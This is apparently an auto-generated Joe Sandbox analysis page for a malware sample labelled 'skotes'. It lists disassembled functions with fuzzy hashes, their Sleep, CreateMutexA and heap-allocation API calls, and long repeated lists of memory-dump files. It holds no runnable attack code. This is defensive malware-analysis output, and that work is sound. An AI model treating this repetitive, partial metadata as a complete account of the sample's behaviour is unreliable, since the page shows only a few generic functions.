Associated: 00000003.00000002.2248030654.0000000000DAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248065200.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248089437.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248114089.0000000000DB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248131505.0000000000DB6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248156552.0000000000DBE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248185867.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248212796.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248212796.0000000000DFC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248295492.0000000000E16000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248322713.0000000000E17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248351516.0000000000E2C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248396234.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248425817.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248450896.0000000000E31000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248478312.0000000000E33000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248506582.0000000000E42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248533616.0000000000E43000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: e5de3929bd11e8baf52b4882cbf2f91c5376eeafc20e13eec4e088dfc2075011
Instruction ID: 1ff19b476d574e391958b0ea35ba1225c5bc0093a94b70885b7d04ac22dca2f7
Opcode Fuzzy Hash: e5de3929bd11e8baf52b4882cbf2f91c5376eeafc20e13eec4e088dfc2075011
Instruction Fuzzy Hash: 40311831A011109BEB08DB7CECC976DB7E2EBC6718F344698E418DB3D1CB7599858752

Function 00B2A682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00B2A963
CreateMutexA.KERNELBASE(00000000,00000000,00B83254), ref: 00B2A981

Memory Dump Source

Source File: 00000003.00000002.2245012498.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2244938416.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245012498.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245755433.0000000000B89000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245823092.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245853653.0000000000B95000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245876712.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245943642.0000000000B97000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246201542.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246295997.0000000000CF6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246329246.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246434770.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246461031.0000000000D12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246461031.0000000000D1B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246554824.0000000000D26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246579344.0000000000D27000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246652100.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246678485.0000000000D47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246711066.0000000000D4E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246775095.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246803189.0000000000D59000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246853738.0000000000D5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246995361.0000000000D5E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247037141.0000000000D67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247149420.0000000000D7A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247238708.0000000000D81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247320382.0000000000D89000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247540162.0000000000D8D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247810360.0000000000D8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247887216.0000000000D91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247917765.0000000000D92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247944442.0000000000D96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247971125.0000000000D9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247998193.0000000000DA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248030654.0000000000DAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248065200.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248089437.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248114089.0000000000DB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248131505.0000000000DB6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248156552.0000000000DBE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248185867.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248212796.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248212796.0000000000DFC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248295492.0000000000E16000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248322713.0000000000E17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248351516.0000000000E2C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248396234.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248425817.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248450896.0000000000E31000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248478312.0000000000E33000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248506582.0000000000E42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248533616.0000000000E43000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 15b8ed867da86c8a91a1af91e56aec9eb836dc8ae4d055ba9960bc619a89e947
Instruction ID: cfd252292c9d974c79d0d33ea5a3247ed6afff93608735054b7bc3b32703f8e5
Opcode Fuzzy Hash: 15b8ed867da86c8a91a1af91e56aec9eb836dc8ae4d055ba9960bc619a89e947
Instruction Fuzzy Hash: F5311631601210DBEB089B7CEDC976DB7E2EB86314F248698E01CDB3E1C77599808766

Function 00B29ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00B2A963
CreateMutexA.KERNELBASE(00000000,00000000,00B83254), ref: 00B2A981

Memory Dump Source

Source File: 00000003.00000002.2245012498.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2244938416.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245012498.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245755433.0000000000B89000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245823092.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245853653.0000000000B95000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245876712.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245943642.0000000000B97000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246201542.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246295997.0000000000CF6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246329246.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246434770.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246461031.0000000000D12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246461031.0000000000D1B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246554824.0000000000D26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246579344.0000000000D27000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246652100.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246678485.0000000000D47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246711066.0000000000D4E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246775095.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246803189.0000000000D59000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246853738.0000000000D5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246995361.0000000000D5E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247037141.0000000000D67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247149420.0000000000D7A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247238708.0000000000D81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247320382.0000000000D89000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247540162.0000000000D8D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247810360.0000000000D8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247887216.0000000000D91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247917765.0000000000D92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247944442.0000000000D96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247971125.0000000000D9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247998193.0000000000DA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248030654.0000000000DAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248065200.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248089437.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248114089.0000000000DB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248131505.0000000000DB6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248156552.0000000000DBE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248185867.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248212796.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248212796.0000000000DFC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248295492.0000000000E16000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248322713.0000000000E17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248351516.0000000000E2C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248396234.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248425817.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248450896.0000000000E31000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248478312.0000000000E33000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248506582.0000000000E42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248533616.0000000000E43000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 6c0688c3a940b99b27df49de45eca87e83aed3c54c401de014bcf838257c8aaa
Instruction ID: 2713d5e4106bac8cca2d043df938d3e81aa449cc28605f85bb68b92cccfb5cec
Opcode Fuzzy Hash: 6c0688c3a940b99b27df49de45eca87e83aed3c54c401de014bcf838257c8aaa
Instruction Fuzzy Hash: E6213731605210DBEB189B6CFCC976DB7E2EBC2714F2046A9E41CCB2E1DB7699808712

Function 00B2A856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00B2A963
CreateMutexA.KERNELBASE(00000000,00000000,00B83254), ref: 00B2A981

Memory Dump Source

Source File: 00000003.00000002.2245012498.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2244938416.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245012498.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245755433.0000000000B89000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245823092.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245853653.0000000000B95000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245876712.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245943642.0000000000B97000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246201542.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246295997.0000000000CF6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246329246.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246434770.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246461031.0000000000D12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246461031.0000000000D1B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246554824.0000000000D26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246579344.0000000000D27000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246652100.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246678485.0000000000D47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246711066.0000000000D4E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246775095.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246803189.0000000000D59000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246853738.0000000000D5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246995361.0000000000D5E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247037141.0000000000D67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247149420.0000000000D7A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247238708.0000000000D81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247320382.0000000000D89000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247540162.0000000000D8D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247810360.0000000000D8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247887216.0000000000D91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247917765.0000000000D92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247944442.0000000000D96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247971125.0000000000D9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247998193.0000000000DA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248030654.0000000000DAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248065200.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248089437.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248114089.0000000000DB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248131505.0000000000DB6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248156552.0000000000DBE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248185867.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248212796.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248212796.0000000000DFC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248295492.0000000000E16000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248322713.0000000000E17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248351516.0000000000E2C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248396234.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248425817.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248450896.0000000000E31000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248478312.0000000000E33000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248506582.0000000000E42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248533616.0000000000E43000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: dd90329e7ff74300001eb5c655d3e7b813b08506938113b2480100f779ccc0ff
Instruction ID: db0e95b21639e451300457c6e7ee9dbd280c83b20fb6698018777285c2f2d9af
Opcode Fuzzy Hash: dd90329e7ff74300001eb5c655d3e7b813b08506938113b2480100f779ccc0ff
Instruction Fuzzy Hash: 3B216D716852119BE724676CBD9A72DB3D2DF81704F2009E6F10CDA3D2CF7688818293

Function 00B2A34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00B2A963
CreateMutexA.KERNELBASE(00000000,00000000,00B83254), ref: 00B2A981

Memory Dump Source

Source File: 00000003.00000002.2245012498.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2244938416.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245012498.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245755433.0000000000B89000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245823092.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245853653.0000000000B95000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245876712.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245943642.0000000000B97000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246201542.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246295997.0000000000CF6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246329246.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246434770.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246461031.0000000000D12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246461031.0000000000D1B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246554824.0000000000D26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246579344.0000000000D27000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246652100.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246678485.0000000000D47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246711066.0000000000D4E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246775095.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246803189.0000000000D59000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246853738.0000000000D5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246995361.0000000000D5E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247037141.0000000000D67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247149420.0000000000D7A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247238708.0000000000D81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247320382.0000000000D89000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247540162.0000000000D8D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247810360.0000000000D8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247887216.0000000000D91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247917765.0000000000D92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247944442.0000000000D96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247971125.0000000000D9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247998193.0000000000DA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248030654.0000000000DAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248065200.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248089437.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248114089.0000000000DB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248131505.0000000000DB6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248156552.0000000000DBE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248185867.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248212796.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248212796.0000000000DFC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248295492.0000000000E16000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248322713.0000000000E17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248351516.0000000000E2C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248396234.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248425817.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248450896.0000000000E31000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248478312.0000000000E33000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248506582.0000000000E42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248533616.0000000000E43000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: aacf2eb2629e47fda43e32b34923dab0f94eae05ff6ecce775a3b69609837148
Instruction ID: f89c8e56647c1fc38567bc6471a2dfcd0350f4b99ced23251ec3af76547e08c6
Opcode Fuzzy Hash: aacf2eb2629e47fda43e32b34923dab0f94eae05ff6ecce775a3b69609837148
Instruction Fuzzy Hash: 072167316052009BEB18DB2CEC8576CB7E2EBC2714F2046A9E41CDB3E5CB76A9C08353

Function 00B5D82F Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00B5A813,00000001,00000364,00000006,000000FF,?,00B5EE3F,?,00000004,00000000,?,?), ref: 00B5D870

Memory Dump Source

Source File: 00000003.00000002.2245012498.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2244938416.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245012498.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245755433.0000000000B89000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245823092.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245853653.0000000000B95000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245876712.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245943642.0000000000B97000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246201542.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246295997.0000000000CF6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246329246.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246434770.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246461031.0000000000D12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246461031.0000000000D1B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246554824.0000000000D26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246579344.0000000000D27000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246652100.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246678485.0000000000D47000.00000040.00000001.01000000.00000007.sdmpDownload File
